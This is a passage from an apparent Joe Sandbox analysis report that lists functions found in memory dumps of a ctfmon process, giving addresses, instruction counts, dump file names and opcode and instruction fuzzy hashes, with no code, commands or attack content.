Opcode Fuzzy Hash: 30e24cd580e34bab19979bddb74ac66c1ead6d62d82ab4bf6a70e3d4421f7372
Instruction Fuzzy Hash: 39412923A0C5595FF329B77CE49AAF87791EF45325F0885BBD00EC72A7DD18A84282C4

Function 00007FFAACBD0D3F Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31614f756910d659569b65b546182ef800553cbc10d135d0bbfc84920842962c
Instruction ID: 5b28db0abe43ab32a8b4e811ebcb1f18e7c6e24978d2d698dd1be04dbc644fc7
Opcode Fuzzy Hash: 31614f756910d659569b65b546182ef800553cbc10d135d0bbfc84920842962c
Instruction Fuzzy Hash: F341D66390A23257FA25BB7CF46A5D177909F0273A7089173C0CDCE663EC14A4C796C5

Function 00007FFAACBDB987 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e2b86992454b379e4741dab52716cbb5c0e6568eaa7c6af20951bca5d877240
Instruction ID: 72a3dd8fe312c8919f95f88b4b79c272bc36c626bbf344efd09cc26ef485f202
Opcode Fuzzy Hash: 3e2b86992454b379e4741dab52716cbb5c0e6568eaa7c6af20951bca5d877240
Instruction Fuzzy Hash: B141BF3160C918CFEF89EB2CC4A5EB473E0FB69320B1445AED04EC7692DE25E845CB81

Function 00007FFAACBD6317 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7a202a02bda71ba468e607bef5b8461273a1c85fec791e065d740569bdee138
Instruction ID: d3bb5ac558ab170207b867524aa07658f1d8bf260cb5d980da01e39f76b2b1d1
Opcode Fuzzy Hash: a7a202a02bda71ba468e607bef5b8461273a1c85fec791e065d740569bdee138
Instruction Fuzzy Hash: 9541B17160CA08CFEF99EB2CC455EB4B7E1FB69320B0445AAD04EC7692CE21E845CB91

Function 00007FFAACBD3BAD Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3956b8acaa5d43f3ce30d466413d3777d415703bb0b343281e91d5a416fc3c
Instruction ID: 5b3b407fa7ad1372b179f425eece25c4dd15224136abfff8831727071faeb744
Opcode Fuzzy Hash: 0c3956b8acaa5d43f3ce30d466413d3777d415703bb0b343281e91d5a416fc3c
Instruction Fuzzy Hash: 2D310271A8E761CFF36A5B1CA4452757BE4EF47351B28843FE48FCA1D3D91AE8064281

Function 00007FFAACBDBA31 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238fe11553f8ccac2984afb8102399616aa8040f28b46d1ab356abe56114a9be
Instruction ID: 3733b4ead84e51645a86a1e5072196cfb47f19c9e8d66bb8629257864606140a
Opcode Fuzzy Hash: 238fe11553f8ccac2984afb8102399616aa8040f28b46d1ab356abe56114a9be
Instruction Fuzzy Hash: 6131A03160C948CFEF99EB2CC4A5E7477E1FB6931071445AED08EC7592DE25E845CB81

Function 00007FFAACBD63C1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e326214f9bec5545e61d35f70999984d5837c23ab0377163fd018e00642b463
Instruction ID: 065c184c6c02e66082b9687a12efe999603f8b79084ab831886f94a771584d29
Opcode Fuzzy Hash: 3e326214f9bec5545e61d35f70999984d5837c23ab0377163fd018e00642b463
Instruction Fuzzy Hash: A331D17160CA488FEF99EB2CC455E7477E1FF69320B0446AED05EC7692CE24E844CB91

Function 00007FFAACBD635B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a906fce70f13659ea3f404ad50d7311889d753fc00c2ea4601802dbe552329c
Instruction ID: 3698e028e13e3d0bdb86c96a6b4a8e45f0d4313321c8a62bed86dd8278c90b83
Opcode Fuzzy Hash: 9a906fce70f13659ea3f404ad50d7311889d753fc00c2ea4601802dbe552329c
Instruction Fuzzy Hash: 1131BF7160CA09CFEF99EB2CC455EB4B7E1FF69320B0445AAD04EC7692CE25E845CB81

Function 00007FFAACBDB9CB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe7bdc530f7b5172abd679327866a0ea93a1cd9f3227c835270a267298dda23
Instruction ID: fc18dfb6ea3ddac4fbbbe7bd99e52ad4ca5424fa9e5660a98fc810aef6ace715
Opcode Fuzzy Hash: 5fe7bdc530f7b5172abd679327866a0ea93a1cd9f3227c835270a267298dda23
Instruction Fuzzy Hash: C831B13160C908CFEF99EB2CC4A5EB473E1FB6831071445AED04EC7692DE25E845CB81

Function 00007FFAACBD8AFD Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54ac2f2745c8622a79e1cdc15c5bf70e901b83428d5a8017e170ba301c06368d
Instruction ID: 087c2654c0c7e2a03325f46cd3da55b135fa6c93573b4f46022adbb715b500ad
Opcode Fuzzy Hash: 54ac2f2745c8622a79e1cdc15c5bf70e901b83428d5a8017e170ba301c06368d
Instruction Fuzzy Hash: 1B317071A09A1ADFEB48DB58D4916B8B7E1FF49311B04813AD01E97682CF25F816CBC0

Function 00007FFAACBD6F83 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720c02663a0c96d4fbe9a8a71616cdcab652a69b5c6886ceb93aeeb61238bf64
Instruction ID: f6f22be4963b73d3084712cf57b3347158b2379192823ea2f566a273c16f20a0
Opcode Fuzzy Hash: 720c02663a0c96d4fbe9a8a71616cdcab652a69b5c6886ceb93aeeb61238bf64
Instruction Fuzzy Hash: D331D27591DA9ECFEF56DB58C8106EC7BB0FF49300F5041BBD00EEB282DA25A8098791

Function 00007FFAACBD18C1 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f0e233d506db356e628d1d581777bcabe7f59317bf1589aa80430c1e5271fc0
Instruction ID: 4c7e0b30b9482c4dbd20c5c592b5e09a1620dfcd015bc6a6dbb5a4570b728c38
Opcode Fuzzy Hash: 6f0e233d506db356e628d1d581777bcabe7f59317bf1589aa80430c1e5271fc0
Instruction Fuzzy Hash: 2C31C87191D69DCFEB46DB68C8606FC7BB0FF56310F0440BAD00EDB1A2DA29980AC751

Function 00007FFAACBD9049 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f51b52f775ae6df2841c42572dbd80762490c4ecd32064265fd36e56bd10cb52
Instruction ID: 9da61c7be3ecf162f38038a18c96c3d43ab42a015f3b18712ff9f6f38dd33795
Opcode Fuzzy Hash: f51b52f775ae6df2841c42572dbd80762490c4ecd32064265fd36e56bd10cb52
Instruction Fuzzy Hash: 23215952E1E6D69FE3569768D4546B17B94EF52211B0481BBD08ECB883EE17A40DC3C1

Function 00007FFAACBD8BBA Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6268d3a0d6b9c918530eb3deb5de84736211e460d5b16db7a4d4240be390a0f2
Instruction ID: c96e046879810603f87b56ef7d07fe0e42c820776d69d86da0b83931acf5492b
Opcode Fuzzy Hash: 6268d3a0d6b9c918530eb3deb5de84736211e460d5b16db7a4d4240be390a0f2
Instruction Fuzzy Hash: 4A31E762D0E65ACFF79A9758D8513E877D1FF46311F08417BD04ECA682ED2BA84986C0

Function 00007FFAACBDB795 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d06fd2b788ed99e203f2d538f297472adafd4ad78ba23a4553b9cdac6d2f710
Instruction ID: f56773bce0e4c7b5c99e203e7eb43b01f7f821459c0c9482e9c18346605dfa3e
Opcode Fuzzy Hash: 8d06fd2b788ed99e203f2d538f297472adafd4ad78ba23a4553b9cdac6d2f710
Instruction Fuzzy Hash: 4E31393091E55ACFFB9ADB58C4916BD7BA1FF56301F50807BD00ECA581DA3AE9888781

Function 00007FFAACBD6125 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79fad2cfdc9afb785e3a61e0a0a3758144704bea71bd65abeb00ccd9300ecc18
Instruction ID: c3f5c30ffce07e3757247f0e674fead80fb70591523c90138f280705654aa9de
Opcode Fuzzy Hash: 79fad2cfdc9afb785e3a61e0a0a3758144704bea71bd65abeb00ccd9300ecc18
Instruction Fuzzy Hash: E6311E3898E91ACEFF5ADB58C4516BD77B0FF46300F545977D00ECA582CA3AA9488B81

Function 00007FFAACBD8A35 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 922740c962a242764942335dc6ff47280ea8755038b814030b5db546bf9dfffc
Instruction ID: df0f7e322a1ca5532d15862ea465c566e51f7679b86cff11e2d984a1c8551f83
Opcode Fuzzy Hash: 922740c962a242764942335dc6ff47280ea8755038b814030b5db546bf9dfffc
Instruction Fuzzy Hash: 4021C161D0E76ACBFB66975488552B97BE0EF56302F0480B7D40DDB182EA6AA90982C1

Function 00007FFAAC7D0998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88efad7444840b1628b3c36ee33e1e56d6fdd950c02a886aebf8ffe8c8a251a3
Instruction ID: 681facd2edb0c801e88291ea37f73984d7bc4a93c1795ae79a975ebcb4e4506e
Opcode Fuzzy Hash: 88efad7444840b1628b3c36ee33e1e56d6fdd950c02a886aebf8ffe8c8a251a3
Instruction Fuzzy Hash: 0B210721B1CA1D4FF749E73C945A77976D2EB99361F0480BEE40EC32E2DC14EC414680

Function 00007FFAACBD5010 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8630fe096878b933bdcf58171ee2a0ea63e417f1517d2db217616645cab01a8
Instruction ID: 6a88914ed64bae1c8f1aec02242df7862ab8cac6144db8189ebd36697c4cb1d7
Opcode Fuzzy Hash: c8630fe096878b933bdcf58171ee2a0ea63e417f1517d2db217616645cab01a8
Instruction Fuzzy Hash: 0E31F85051E5A68BFB2BC3188864AB47B55EF5231071885BBC09FCF487C51EE88DC3C1

Function 00007FFAACBDA680 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 297c0c4202fc8456243d9ff71c3c647bcff5d1bc25a9120552dabb8f0070a72b
Instruction ID: a4a8924e1563c5dd00de42549db0b9d9447692ab64fd1e25933d454cd7442f34
Opcode Fuzzy Hash: 297c0c4202fc8456243d9ff71c3c647bcff5d1bc25a9120552dabb8f0070a72b
Instruction Fuzzy Hash: 0B31F81091E5B6CBF76B831888647747B61EB63310B1C86BBD08F9F4D7D82DE4499381

Function 00007FFAACBD34B2 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f79b4d28c16ebee0622aaa470e08328cff4a27d7ac24bdb14242ec6e79f8eca
Instruction ID: c130e13760ce3f0ff0207cb701d644394a34d585a297cac490400aed82303f87
Opcode Fuzzy Hash: 5f79b4d28c16ebee0622aaa470e08328cff4a27d7ac24bdb14242ec6e79f8eca
Instruction Fuzzy Hash: 6A212871E19A1ADFEB49DB58C491AB8B7A1FF49310B14817AD40ED7682CF24BC168BC0

Function 00007FFAACBDBF4D Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f165c4b24cc35d5b108ead7f7212f41267f04fab8229258a42bee9ed6937a6
Instruction ID: 90010138ac99bf8275b837f3b1ea46d9d3d7214469f8684b26349396409312f6
Opcode Fuzzy Hash: b0f165c4b24cc35d5b108ead7f7212f41267f04fab8229258a42bee9ed6937a6
Instruction Fuzzy Hash: 1A21663191895ECFEF95DB58D850AFDBBB1FF59300F10817AD00EEB291DE29A8058B81

Function 00007FFAACBD7B02 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34ecdc3c8d8114393f0bc333365aaa49b6562744b5f7827bf1fd055c03e9e26e
Instruction ID: 42ce85cfbfc300e1768cb83f9e58fbe14067774157917db2becc28903a0cdaf7
Opcode Fuzzy Hash: 34ecdc3c8d8114393f0bc333365aaa49b6562744b5f7827bf1fd055c03e9e26e
Instruction Fuzzy Hash: B6313830A0891DCFDF99DB58C4A5AE8B7B1FF59300F1041AED04EE7695CE35A981CB40

Function 00007FFAACBDCAA2 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1db3a9c1c4c0e4818ed4ddb2afa74b561a3e6d7a3bc2f83c24b7c4ecbb893dc
Instruction ID: 6cb883b5a2b94635acac29ccba43aab8f52506ef7bd47e001cccda519629b851
Opcode Fuzzy Hash: b1db3a9c1c4c0e4818ed4ddb2afa74b561a3e6d7a3bc2f83c24b7c4ecbb893dc
Instruction Fuzzy Hash: DC212770E1892D9FEF99DB58D4A5AEDB7B1FF59310F0041AAD00EE7291CF35A9408B80

Function 00007FFAACBD2432 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d7ec66438de57658960e06ef60124c1665d66b94df957f90b90ab965f9baf4
Instruction ID: cbdceea3a3226d366124baec03a4e810a8965cfe59869e533169cec5bb3fc08a
Opcode Fuzzy Hash: e8d7ec66438de57658960e06ef60124c1665d66b94df957f90b90ab965f9baf4
Instruction Fuzzy Hash: 8C213670A0891C9FEF99DB18C495AECB7B1FF58301F0041AAD00EE7691CE35AD41CB81

Function 00007FFAACBD33D9 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16d866bc2533fd1ac4cf658b4d1224c6ee279f98015c9cf8915d23861510f79c
Instruction ID: 639b93802c7bb0ce1430ec7064c05823f6fcafd19f024346b75e77089192088a
Opcode Fuzzy Hash: 16d866bc2533fd1ac4cf658b4d1224c6ee279f98015c9cf8915d23861510f79c
Instruction Fuzzy Hash: 6721342190E69A8FF762876888942B93AB0DF4B311F050077E00DDB2C3DD6DA84A83E1

Function 00007FFAAC7D0C25 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a5501b5d833d8e9b1c90b6fa6bd928d744798f9db6d2e3b389d42f2207e423
Instruction ID: c234a9206a4e4041824c943b905ef1681299c4ce89c79256332f875eacae85a0
Opcode Fuzzy Hash: 01a5501b5d833d8e9b1c90b6fa6bd928d744798f9db6d2e3b389d42f2207e423
Instruction Fuzzy Hash: A7218D75A0E6898FF712DB6898492FD7FB0EF42311F1485BBC04D8B1D2E938A549CB81

Function 00007FFAACBD359B Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 251ce0735eeea976c9bf9731888e5c2c6d8c856a16a05b3df5e757a326e08ad1
Instruction ID: be2e6b5bf32ecd9f03c6ecf5da6bf97e2f60633691b9f1b9d65c0736ed644b04
Opcode Fuzzy Hash: 251ce0735eeea976c9bf9731888e5c2c6d8c856a16a05b3df5e757a326e08ad1
Instruction Fuzzy Hash: 4321C971E0EA658FFB55E768D8956BC77A0EF5A311F04417AD00DC72C3CE29A84687C0

Function 00007FFAAC7D4DAF Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3518b6bf2f1f786def931108c22ab68222a09be77c8b2c073a7c155adf52dee6
Instruction ID: 4355fbe34e7d7c9db145bd4049e9a4eea624c6a6b03256b19fb1ad6cb3f8ff85
Opcode Fuzzy Hash: 3518b6bf2f1f786def931108c22ab68222a09be77c8b2c073a7c155adf52dee6
Instruction Fuzzy Hash: 05212130A0951ACBFB95EB14C855BBC22B1EF96310F0591B6D54ED7192DE38ED854F80

Function 00007FFAACBDA6B0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0041efe39e34a854c63ae57458cdee63fc74a736932bda83f69eb18b783740d
Instruction ID: f60084e85f762efc669b557a40feaf115e4f01b1a649808f78e8dc82cd91421c
Opcode Fuzzy Hash: f0041efe39e34a854c63ae57458cdee63fc74a736932bda83f69eb18b783740d
Instruction Fuzzy Hash: F611D51092D47AC6F66E8308C5547B576A1FB61701B2CCA7BD08F9F89AD82DF98593C0

Function 00007FFAACBD5040 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca004143d147781f477996801eca9da0f10075babcf3c01f33d0746b2e085ee
Instruction ID: 4eaf4a69d9c0edac57dd8cb89dae0c0a6d40342e420f752bd208be390cde2da8
Opcode Fuzzy Hash: 3ca004143d147781f477996801eca9da0f10075babcf3c01f33d0746b2e085ee
Instruction Fuzzy Hash: FC11C65091E47AC7FB2AC318D864AB46755FF51301728C576D05F8F48AC92AF88D97C0

Function 00007FFAACBD9730 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d28c5fa6dc5913f75838f9cd02967fe01041106dbed5667da464cca1e29a058
Instruction ID: d8b3fab54d21dca4826bf8ea949e6bd0dfd2ea1fd3e4ef7b7216166aad670b4f
Opcode Fuzzy Hash: 6d28c5fa6dc5913f75838f9cd02967fe01041106dbed5667da464cca1e29a058
Instruction Fuzzy Hash: 0411B235E09A1ACEFB65EB24D4406F97390FF69351B00867BD40ECB592DF29F80982D0

Function 00007FFAACBD95AE Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8457ea7fb6dc4ff3d15c5a8a5eb680300774dd683b9bf93bfb56f4a4a2129a6
Instruction ID: 9ea65d825dccf0ddae237f96256a2cefd949549d00aecc2be31e51c2e568e9c1
Opcode Fuzzy Hash: c8457ea7fb6dc4ff3d15c5a8a5eb680300774dd683b9bf93bfb56f4a4a2129a6
Instruction Fuzzy Hash: 1A11C231A0A51ACFFB169F18E4547E53390EF66351F10863BE90ECB691EF6AA85487C0

Function 00007FFAACBD3F3E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a7869b7a6274126d06786f9f7cc6de76c73291ecc0515b985d6c6eec41eeee
Instruction ID: d857d4569052f5f529836a984e6c389c8b84ee5558e91fa02bfb89e6dc57d84e
Opcode Fuzzy Hash: 07a7869b7a6274126d06786f9f7cc6de76c73291ecc0515b985d6c6eec41eeee
Instruction Fuzzy Hash: 67112531A0A51ACFFB169B18D4817F43394EF66351F14853BE90DCB2D1DE6EA8488BC0

Function 00007FFAAC7D4D2C Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 712b972e0ffee75e733653eb442c54d374ac5a0d0b6934d1bc43e3b953827f63
Instruction ID: 163e133e33fa11f9d881170444e91ce3e316fadb072b488ee40994ac1479b282
Opcode Fuzzy Hash: 712b972e0ffee75e733653eb442c54d374ac5a0d0b6934d1bc43e3b953827f63
Instruction Fuzzy Hash: 10114F21E1991A8AFAA6AB18C8597BC22B1EF55300F5181B7D80ED7292DE2CE9444F80

Function 00007FFAACBD40BC Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b1e01fa4e183dc7aa1af33631c197b91bb90a51ac3cb12db391406372b7b7f
Instruction ID: 574ca7838d4e5a582d59dbad80cdcdb54ffa0cc76bea61930e1b3e67b63707f1
Opcode Fuzzy Hash: 02b1e01fa4e183dc7aa1af33631c197b91bb90a51ac3cb12db391406372b7b7f
Instruction Fuzzy Hash: DC01F52190EA569FEB16673094056F97BA0EF96251B0086BBD04ECB9D3CE2CA4098790

Function 00007FFAAC7D0C40 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

